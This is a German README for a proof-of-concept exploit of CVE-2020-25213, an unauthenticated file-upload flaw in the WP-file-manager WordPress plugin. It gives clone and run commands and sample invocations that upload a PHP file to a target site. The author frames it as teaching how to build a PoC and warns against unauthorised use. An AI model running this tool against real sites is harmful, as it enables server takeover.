
https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8
Das WordPress-Plugin WP-file-manager (<6.9) ist anfällig für nicht authentifizierte Uploads beliebiger Dateien, was zu einer vollständigen Kompromittierung des Systems führt.
Für weitere Details verweise ich auf mein hier veröffentlichtes Writeup.
Ich habe diese Schwachstelle nicht entdeckt und beanspruche auch keine Anerkennung für diese CVE. Ich habe den Exploit nur erstellt, nachdem ich die auf verschiedenen Blogs wie wordfence und seravo verfügbare Beschreibung analysiert habe, mit dem Ziel, den Lesern zu zeigen, wie man einen POC erstellt, indem man lediglich die Beschreibung der Schwachstelle analysiert.
Ich bin nicht verantwortlich für Schäden, die einer Organisation durch die Verwendung dieses Exploits entstehen, und ich rate den Lesern, diese Schwachstelle nicht ohne schriftliche Zustimmung der Organisation auszunutzen, da dies die Organisation für Angriffe durch andere Hacker öffnen könnte.
git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213/wp-file-manager-exploit.sh
-u|--wp_url WordPress-Ziel-URL
-f|--upload_file Absoluter Speicherort der lokalen Datei, die auf das Ziel hochgeladen werden soll.
-k|--check Prüft nur, ob der anfällige Endpunkt existiert und einen bestimmten Fingerprint aufweist. Es wird keine Datei hochgeladen.
-v|--verbose Gibt außerdem den curl-Befehl aus, der ausgeführt wird
-h|--help Hilfemenü anzeigen
./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
